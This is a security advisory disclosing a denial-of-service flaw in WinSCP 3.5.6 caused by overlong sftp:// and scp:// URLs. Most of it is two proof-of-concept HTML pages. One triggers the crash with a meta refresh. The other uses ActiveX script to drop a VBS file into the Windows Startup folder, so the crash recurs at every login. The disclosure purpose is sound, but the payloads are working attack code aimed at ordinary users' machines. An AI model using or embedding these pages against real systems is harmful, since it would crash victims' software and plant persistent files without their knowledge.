‘WinSCP Denial of Service’

Summary

WinSCP is ‘an open source SFTP (SSH File Transfer Protocol) and SCP (Secure CoPy) client for Windows using SSH (Secure SHell). Its main function is safe copying of files between a local and a remote computer’. A malicious attacker can send an email containing a link that will cause WinSCP to crash.’

Credit:

‘The information has been provided by Luca Ercoli.’


Details

Vulnerable Systems:
 * WinSCP version 3.5.6 (prior versions might be also vulnerable)

The default installation of WinSCP provides the user with functionality to handle sftp:// and scp:// addresses. The vulnerability exists due to the way the application handles long URL’s. A malformed scp:// or sftp:// address embedded in a HTML tag causes the WinSCP application to exhaust CPU and Memory resources. The attacker would need the ability to convince the user to visiting a web site he controlled or opening an HTML e-mail he had prepared. During the denial of service, WinSCP will not display any GUI.

Proof of Concept:
—— WinSCP_DoS1.html ——–

<HTML>
<HEAD>
<TITLE>WinSCP DoS</TITLE>

<meta http-equiv=’Refresh’ content=’0; URL=sftp://AAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA’>

</HEAD>
<BODY>
</BODY>
</HTML>

——– WinSCP_DoS2.html ——-

<html>
  <head>
   <title>WinSCP DoS</title>

 <script language=’JScript’>

     var WshShell = new ActiveXObject(‘WScript.Shell’);
     strSU = WshShell.SpecialFolders(‘StartUp’);

     var fso = new ActiveXObject(‘Scripting.FileSystemObject’);
     var vibas = fso.CreateTextFile(strSU + ‘\WinSCPDoS.vbs’,true);

     vibas.WriteLine(‘Dim shell’);
     vibas.WriteLine(‘Dim quote’);
     vibas.WriteLine(‘Dim DoS’);
     vibas.WriteLine(‘Dim param’);
     vibas.WriteLine(‘DoS = ‘C:\Programmi\WinSCP3\WinSCP3.exe”);
     vibas.WriteLine(‘param = ‘scp://AAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA”);
     vibas.WriteLine(‘set shell = WScript.CreateObject(‘WScript.Shell’)’);
     vibas.WriteLine(‘quote = Chr(34)’);
     vibas.WriteLine(‘pgm = ‘explorer”);
     vibas.WriteLine(‘shell.Run quote & DoS & quote & ‘ ‘ & param’);

     vibas.Close();

    </script>

  </head>
</html>’

Categories: Windows